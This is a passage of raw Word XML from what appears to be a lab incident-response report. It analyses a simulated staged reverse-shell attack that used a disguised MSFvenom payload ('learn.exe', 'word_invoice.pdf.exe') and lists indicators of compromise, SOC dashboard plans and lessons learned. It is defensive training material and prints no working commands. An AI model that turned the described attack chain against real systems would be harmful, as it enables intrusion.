      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="11952BEF" w14:textId="3017B698">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281"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 CMD.exe Triggered the Malicious Payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="682A4317" w14:textId="72ECC34B">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From the process chain,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CMD.exe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was used to execute further malicious logic, which eventually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initiated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the outbound reverse-shell connection (Event ID 3).</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This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indicates</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that the file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learn.exe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acted as either:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="76037108" w14:textId="14B2CDE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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The actual payload wrapper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4AC9F045" w14:textId="0DFDB1F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>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Or the loader responsible for executing the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MSFvenom</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payload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word_invoice.pdf.exe</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or equivalent)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1C274AB3" w14:textId="08919C8F">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7. Indicators of Compromise (IOCs)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="17A90359" w14:textId="0966E8AD">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File Indicators:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="76F7EEE8" w14:textId="2278FC23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Suspicious executable launched from user directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6BCCE678" w14:textId="1E5C1D1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="140"/>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Temporary files created during staging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="637637C3" w14:textId="099D9E12">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Process Indicators:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="7F1C11CA" w14:textId="746F7307">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Malicious parent/child process chain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="16D060CC" w14:textId="40CEC85B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="141"/>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Execution of interactive shell commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="50769FC6" w14:textId="55DEDC5E">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Network Indicators:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="75E1FAAF" w14:textId="27F137FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Outbound TCP connection to attacker (Event ID 3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="69F34775" w14:textId="22EAAB6F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="142"/>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Suspicious DNS lookup to external domain (Event ID 22)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="42D10225" w14:textId="62FCC772">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Behavioral Indicators:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2D5E0F73" w14:textId="50697BD7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Registry value changes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="7209FA11" w14:textId="6FD5A090">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Alternate data stream creation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="25F67014" w14:textId="7C6BFD77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="143"/>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System reconnaissance commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2BB03E9D" w14:textId="545D48E8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299"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 xml:space="preserve">10. Updated Final Assessment </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="24BB0169" w14:textId="3A165E2B">
      <w:p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With the addition of the discovered process-chain data, the incident is now fully </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validated</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 as a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successful staged reverse-shell attack</w:t>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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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The presence of:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5CF807F9" w14:textId="1A8F6344">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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File download via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explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="62A98926" w14:textId="3C862B4A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Immediate execution of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learn.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2078E5A8" w14:textId="0B69CEAE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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 xml:space="preserve">Abnormal child process </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="282F2B94">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8"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CMD.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6D69979B" w14:textId="0169519E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Command shell used to run malicious payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="469AB0D2" w14:textId="2754CA57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="both"/>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8"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reverse TCP connection to attacker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="37831E56" w14:textId="75ADBD59">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:num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Execution of reconnaissance commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0596AE80" w14:textId="3BC6347A">
      <w:p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shows a complete attacker lifecycle consistent with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="68F49E53" w14:textId="327F9C3A">
      <w:p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1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Initial Access → Execution → Command &amp; Control → Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="117BEC9B" w14:textId="1CF08AD6">
      <w:p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The new process-chain evidence </w:t>
      </w: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greatly improves</w:t>
      </w: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detection fidelity and provides a precise timeline necessary for root-cause analysis, threat hunting, and use-case enhancement.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="67F37136" w14:textId="58446728">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299"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1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SOC Dashboard Improvements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2AFEA82D" w14:textId="25877A5B">
      <w:p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To enhance monitoring visibility and reduce investigation time, we built a new dashboard that provides:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4DAF3192" w14:textId="1159976D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281"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1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1. Device and Authentication Statistics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="07B7CCE2" w14:textId="5F9486C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:num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Number of authentication attempts per host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0D355F06" w14:textId="09F80F85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:num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Distribution of failed vs successful logins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="401933BE" w14:textId="62FC3A20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:num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Trends of login failures over time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4769CE8F" w14:textId="1D0BC818">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281"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1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Top 10 Alerts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="04976C0C" w14:textId="5258DB35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:num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Visualization of the </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="282F2B94">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>most frequent 10 alerts</w:t>
      </w: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across the environment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="56B17FDD" w14:textId="4F557DE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:num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Helps analysts prioritize noisy rules and </w:t>
      </w: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optimize</w:t>
      </w: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detection logic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="672FFD62" w14:textId="141BF11D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281"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1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. High-Risk Host Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0850AE85" w14:textId="2B5DC19A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:num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Hosts generating unusual authentication activity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="7F212EB3" w14:textId="48415EFD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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Machines with repeated failed login </w:t>
      </w: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attempts</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="282F2B94">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or multiple security alerts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="27FF87B1" w14:textId="11DD51F9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2412BD1F" w14:textId="284AEB3E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="282F2B94">
        <w:drawing>
          <wp:inline wp14:editId="532033CC" wp14:anchorId="53E7AF74">
            <wp:extent cx="5943600" cy="3695700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8961569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6156965" name="Picture 896156965"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId69493949">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3695700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="45D6F7FD" w:rsidRDefault="166587AE" w14:paraId="6EC88301" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="45D6F7FD" w:rsidR="282C5353">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Conclusion &amp; Future Work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="525588F4" w14:textId="1C8F1EEE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>This project provided significant hands‑on experience in designing, implementing, and testing a full Incident Response Plan. The team gained practical skills in:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>• Using Splunk for log analysis and SIEM alerting</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>• Deploying Sysmon for deep visibility</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>• Simulating adversary behavior using CALDERA</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>• Investigating real attack scenarios including brute force and reverse shells</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>What worked well:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>• Lab setup was stable and produced high‑quality logs</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>• Detection, containment, and analysis procedures followed PICERL effectively</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>• Collaboration between roles (SOC, Forensics, Commander) was clear</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>Areas for improvement:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>• Add more advanced attack simulations</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>• Expand dashboards for threat hunting</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>• Improve automation of alerts and correlation rules</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>Future Work:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>• Implement ransomware simulation in CALDERA</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>• Build automated SOAR playbooks</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>• Add MITRE ATT&amp;CK mapping for all detections</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="282C5353">
        <w:rPr/>
        <w:t>• Expand the environment to include Linux servers and domain controller</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="721245D8" w14:textId="49187DBC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="1334E8EB" w14:textId="1B5C30E7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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8"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="45D9C79F" w:rsidP="732EE1AE" w:rsidRDefault="45D9C79F" w14:paraId="01A1233E" w14:textId="1C73B3AC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="45D9C79F" w:rsidP="732EE1AE" w:rsidRDefault="45D9C79F" w14:paraId="5AC7B1EE" w14:textId="5CA07FE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>National Institute of Standards and Technology (NIST).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(2021).</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Computer Security Incident Handling Guide (Special Publication 800-61 Revision 2).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
